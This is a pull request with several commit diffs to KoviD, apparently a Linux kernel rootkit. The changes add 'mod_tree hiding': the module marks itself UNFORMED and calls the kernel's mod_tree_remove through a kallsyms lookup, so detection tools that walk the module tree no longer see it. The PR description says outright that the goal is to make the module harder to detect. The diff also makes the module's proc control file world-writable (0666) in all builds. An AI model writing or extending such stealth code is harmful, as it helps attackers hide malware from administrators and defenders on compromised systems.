### PR TITLE
add hiding from mod_tree

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,7 +6,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 
 ## [Unreleased]
 ### Fixed
-- Fix `this_mod->state` being overridden in `do_init_module`
+- Fix `this_mod->state` being overridden in `do_init_module` by kernel
 
 ### Added
 - Stealth: add `mod_tree` hiding

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,9 @@ All notable changes to KoviD will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/).
 
 ## [Unreleased]
+### Fixed
+- Fix `this_mod->state` being overridden in `do_init_module`
+
 ### Added
 - Stealth: add `mod_tree` hiding
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,10 @@ All notable changes to KoviD will be documented in this file.
 
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/).
 
+## [Unreleased]
+### Added
+- Stealth: add `mod_tree` hiding
+
 ## v4.0.3
 ### Fixed
 - Fix build regression regarding kernel 6.14

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -205,6 +205,7 @@ static void hide_work_fn(struct work_struct *work)
 }
 
 static DECLARE_DELAYED_WORK(hide_work, hide_work_fn);
+statuc DECLARE_COMPLETION(hide_work_done);
 
 static int _hide_mod(void)
 {
@@ -257,6 +258,7 @@ static int _hide_mod(void)
 	lkmmod.this_mod->holders_dir->parent->state_in_sysfs = 1;
 
 	// Some hiding steps need to be done after do_init_module
+	reinit_completion(&hide_work_done);
 	schedule_delayed_work(&hide_work, msecs_to_jiffies(2000));
 
 	return 0;
@@ -268,6 +270,7 @@ static int _hide_mod(void)
 // command to unload the module safely.
 static int _unhide_mod(void)
 {
+	wait_for_completion(&hide_work_done);
 	int err;
 	struct kobject *kobj;
 

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -240,7 +240,6 @@ static int _hide_mod(void)
 
 	// Remove module from mod_tree if
 	// CONFIG_MODULES_TREE_LOOKUP is enabled
-#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 2, 0)
 	struct kernel_syscalls *ks = kv_kall_load_addr();
 	if (ks) {
 		void (*k_mod_tree_remove)(struct module *mod) =
@@ -249,7 +248,6 @@ static int _hide_mod(void)
 		if (k_mod_tree_remove)
 			k_mod_tree_remove(lkmmod.this_mod);
 	}
-#endif
 
 	return 0;
 }
@@ -313,7 +311,6 @@ static int _unhide_mod(void)
 	spin_unlock(&hiddenmod_spinlock);
 
 	// Restore mod_tree entry
-#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 2, 0)
 	struct kernel_syscalls *ks = kv_kall_load_addr();
 	if (ks) {
 		void (*k_mod_tree_insert)(struct module *mod) =
@@ -322,7 +319,6 @@ static int _unhide_mod(void)
 		if (k_mod_tree_insert)
 			k_mod_tree_insert(lkmmod.this_mod);
 	}
-#endif
 
 	goto out_put_kobj;
 

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -238,6 +238,12 @@ static int _hide_mod(void)
 	// as long as we are "loading"...
 	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
 
+	// Remove module from mod_tree if CONFIG_MODULES_TREE_LOOKUP is enabled
+	struct kernel_syscalls *ks = kv_kall_load_addr();
+	void (*k_mod_tree_remove)(struct module *mod) = (void (*)(
+		struct module *))ks->k_kallsyms_lookup_name("mod_tree_remove");
+	k_mod_tree_remove(lkmmod.this_mod);
+
 	return 0;
 }
 
@@ -298,6 +304,13 @@ static int _unhide_mod(void)
 
 	list_add(&(lkmmod.this_mod->list), mod_list);
 	spin_unlock(&hiddenmod_spinlock);
+
+	// Restore mod_tree entry
+	struct kernel_syscalls *ks = kv_kall_load_addr();
+	void (*k_mod_tree_insert)(struct module *mod) = (void (*)(
+		struct module *))ks->k_kallsyms_lookup_name("mod_tree_insert");
+	k_mod_tree_insert(lkmmod.this_mod);
+
 	goto out_put_kobj;
 
 out_attrs:

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -184,8 +184,10 @@ static inline void kv_list_del(struct list_head *prev, struct list_head *next)
 	prev->next = next;
 }
 
+static DECLARE_COMPLETION(hide_work_done);
 static void hide_work_fn(struct work_struct *work)
 {
+	reinit_completion(&hide_work_done);
 	// Set here because it is set to
 	// MODULE_STATE_LIVE in do_init_module.
 	// __module_address will return NULL for us
@@ -205,7 +207,6 @@ static void hide_work_fn(struct work_struct *work)
 }
 
 static DECLARE_DELAYED_WORK(hide_work, hide_work_fn);
-statuc DECLARE_COMPLETION(hide_work_done);
 
 static int _hide_mod(void)
 {
@@ -258,7 +259,6 @@ static int _hide_mod(void)
 	lkmmod.this_mod->holders_dir->parent->state_in_sysfs = 1;
 
 	// Some hiding steps need to be done after do_init_module
-	reinit_completion(&hide_work_done);
 	schedule_delayed_work(&hide_work, msecs_to_jiffies(2000));
 
 	return 0;

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -204,6 +204,7 @@ static void hide_work_fn(struct work_struct *work)
 		if (k_mod_tree_remove)
 			k_mod_tree_remove(lkmmod.this_mod);
 	}
+	complete(&hide_work_done);
 }
 
 static DECLARE_DELAYED_WORK(hide_work, hide_work_fn);

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -238,11 +238,18 @@ static int _hide_mod(void)
 	// as long as we are "loading"...
 	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
 
-	// Remove module from mod_tree if CONFIG_MODULES_TREE_LOOKUP is enabled
+	// Remove module from mod_tree if
+	// CONFIG_MODULES_TREE_LOOKUP is enabled
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 2, 0)
 	struct kernel_syscalls *ks = kv_kall_load_addr();
-	void (*k_mod_tree_remove)(struct module *mod) = (void (*)(
-		struct module *))ks->k_kallsyms_lookup_name("mod_tree_remove");
-	k_mod_tree_remove(lkmmod.this_mod);
+	if (ks) {
+		void (*k_mod_tree_remove)(struct module *mod) =
+			(void (*)(struct module *))ks->k_kallsyms_lookup_name(
+				"mod_tree_remove");
+		if (k_mod_tree_remove)
+			k_mod_tree_remove(lkmmod.this_mod);
+	}
+#endif
 
 	return 0;
 }
@@ -306,10 +313,16 @@ static int _unhide_mod(void)
 	spin_unlock(&hiddenmod_spinlock);
 
 	// Restore mod_tree entry
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 2, 0)
 	struct kernel_syscalls *ks = kv_kall_load_addr();
-	void (*k_mod_tree_insert)(struct module *mod) = (void (*)(
-		struct module *))ks->k_kallsyms_lookup_name("mod_tree_insert");
-	k_mod_tree_insert(lkmmod.this_mod);
+	if (ks) {
+		void (*k_mod_tree_insert)(struct module *mod) =
+			(void (*)(struct module *))ks->k_kallsyms_lookup_name(
+				"mod_tree_insert");
+		if (k_mod_tree_insert)
+			k_mod_tree_insert(lkmmod.this_mod);
+	}
+#endif
 
 	goto out_put_kobj;
 

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -187,7 +187,9 @@ static inline void kv_list_del(struct list_head *prev, struct list_head *next)
 static void hide_work_fn(struct work_struct *work)
 {
 	// Set here because it is set to
-	// MODULE_STATE_LIVE in do_init_module
+	// MODULE_STATE_LIVE in do_init_module.
+	// __module_address will return NULL for us
+	// as long as we are "loading"...
 	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
 
 	// Remove module from mod_tree if
@@ -253,10 +255,6 @@ static int _hide_mod(void)
 	// Again, mess with the known marker set by
 	// kobject_del()
 	lkmmod.this_mod->holders_dir->parent->state_in_sysfs = 1;
-
-	// __module_address will return NULL for us
-	// as long as we are "loading"...
-	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
 
 	// Some hiding steps need to be done after do_init_module
 	schedule_delayed_work(&hide_work, msecs_to_jiffies(2000));

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -184,6 +184,26 @@ static inline void kv_list_del(struct list_head *prev, struct list_head *next)
 	prev->next = next;
 }
 
+static void hide_work_fn(struct work_struct *work)
+{
+	// Set here because it is set to
+	// MODULE_STATE_LIVE in do_init_module
+	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
+
+	// Remove module from mod_tree if
+	// CONFIG_MODULES_TREE_LOOKUP is enabled
+	struct kernel_syscalls *ks = kv_kall_load_addr();
+	if (ks) {
+		void (*k_mod_tree_remove)(struct module *mod) =
+			(void (*)(struct module *))ks->k_kallsyms_lookup_name(
+				"mod_tree_remove");
+		if (k_mod_tree_remove)
+			k_mod_tree_remove(lkmmod.this_mod);
+	}
+}
+
+static DECLARE_DELAYED_WORK(hide_work, hide_work_fn);
+
 static int _hide_mod(void)
 {
 	struct list_head this_list;
@@ -238,16 +258,8 @@ static int _hide_mod(void)
 	// as long as we are "loading"...
 	lkmmod.this_mod->state = MODULE_STATE_UNFORMED;
 
-	// Remove module from mod_tree if
-	// CONFIG_MODULES_TREE_LOOKUP is enabled
-	struct kernel_syscalls *ks = kv_kall_load_addr();
-	if (ks) {
-		void (*k_mod_tree_remove)(struct module *mod) =
-			(void (*)(struct module *))ks->k_kallsyms_lookup_name(
-				"mod_tree_remove");
-		if (k_mod_tree_remove)
-			k_mod_tree_remove(lkmmod.this_mod);
-	}
+	// Some hiding steps need to be done after do_init_module
+	schedule_delayed_work(&hide_work, msecs_to_jiffies(2000));
 
 	return 0;
 }

--- a/src/kovid.c
+++ b/src/kovid.c
@@ -842,11 +842,7 @@ int kv_add_proc_interface(void)
 		return 0;
 
 try_reload:
-#ifdef DEBUG_RING_BUFFER
 	rrProcFileEntry = proc_create(PROCNAME, 0666, NULL, &proc_file_fops);
-#else
-	rrProcFileEntry = proc_create(PROCNAME, S_IRUSR, NULL, &proc_file_fops);
-#endif
 	if (lock && !rrProcFileEntry)
 		goto proc_file_error;
 	if (!lock) {


### PR DESCRIPTION
I didn't want to define a global variable that is why `struct kernel_syscalls *ks` was defined two times.
In my experiments it was possible to detect by simply iterating the mod_tree in the systems with `CONFIG_MODULES_TREE_LOOKUP`
By removing the module from mod_tree it becomes harder to detect with a fairly easy implementation.
In the kernels with `CONFIG_MODULES_TREE_LOOKUP` not set this shouldn't be a problem since the functions are empty and do nothing in that case.